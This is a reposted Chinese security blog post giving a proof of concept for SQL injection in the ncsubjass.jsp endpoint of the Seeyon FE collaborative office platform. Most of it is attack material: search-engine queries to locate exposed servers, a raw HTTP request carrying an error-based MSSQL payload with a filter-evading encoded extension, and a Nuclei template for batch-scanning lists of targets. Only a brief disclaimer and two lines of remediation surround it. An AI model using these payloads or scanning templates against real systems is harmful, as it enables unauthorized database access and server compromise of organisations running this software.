致远互联FE协作办公平台 ncsubjass SQL注入 poc

admin 2024年6月21日09:48:00评论41 views字数 2366阅读7分53秒阅读模式
0x01 免责声明
disclaimer

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。信息及工具收集于互联网,真实性及安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 漏洞介绍
Vulnerability introduction
    致远互联FE协作办公平台/fenc/ncsubjass.jsp接口存在SQL注入漏洞,攻击者可以通过漏洞获取服务器内敏感信息导致信息泄露,甚至通过漏洞写入木马病毒获取服务器权限。

0x03 搜索语法
Search for syntax
  • Fofa:
body="li_plugins_download"
  • Hunter
body="li_plugins_download"
  • Quake
body="li_plugins_download"

致远互联FE协作办公平台 ncsubjass  SQL注入 poc

0x04 漏洞复现
Request packets
  • SQL报错注入,注意URL编码
POST /fenc/ncsubjass.j%73p HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Length: 364
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

subjcode=1%27%20AND%203576%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28113%29%2B%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28SYSTEM_USER%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28118%29%2BCHAR%28113%29%29%29%20AND%20%27jPMS%27%3D%27jPMS
致远互联FE协作办公平台 ncsubjass  SQL注入 poc
0x05 nuclei POC
nuclei POC
  • Nuclei 批量检测POC
  • 所用方法nuclei.exe -l 网址文件.txt -t POC.yaml
id: Seeyon_FE_OA_ncsubjass_SQL_injected

info:
  name: Seeyon_FE_OA_ncsubjass_SQL_injected
  author: security-xm
  severity: high
  description: There is a SQL injection vulnerability in the ncsubjass.jsp of Zhiyuan Internet's FE collaborative office platform
  metadata:
    max-request: 1
    shodan-query: ""
    verified: true

http:
  - raw:
      - |
        @timeout: 30s
        POST /fenc/ncsubjass.j%73p HTTP/1.1
        Accept-Encoding: gzip, deflate, br
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Cookie: JSESSIONID=A29F8F31E3D9BA108017E2FF1BA07AFD
        Connection: close
        Content-Length: 498

        subjcode=1%27%20AND%203576%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28113%29%2B%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28SYSTEM_USER%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28118%29%2BCHAR%28113%29%29%29%20AND%20%27jPMS%27%3D%27jPMS

    max-redirects: 3
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - qjzbqsaqjzvq
致远互联FE协作办公平台 ncsubjass  SQL注入 poc
0x07 修复建议
Remediation recommendations
  • 在Web应用防火墙中添加接口临时黑名单规则
  • 联系厂商打补丁或升级版本。

 

原文始发于微信公众号(小明信安):【漏洞复现 | 含批量POC】致远互联FE协作办公平台 ncsubjass SQL注入

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月21日09:48:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   致远互联FE协作办公平台 ncsubjass SQL注入 pochttps://cn-sec.com/archives/2869558.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息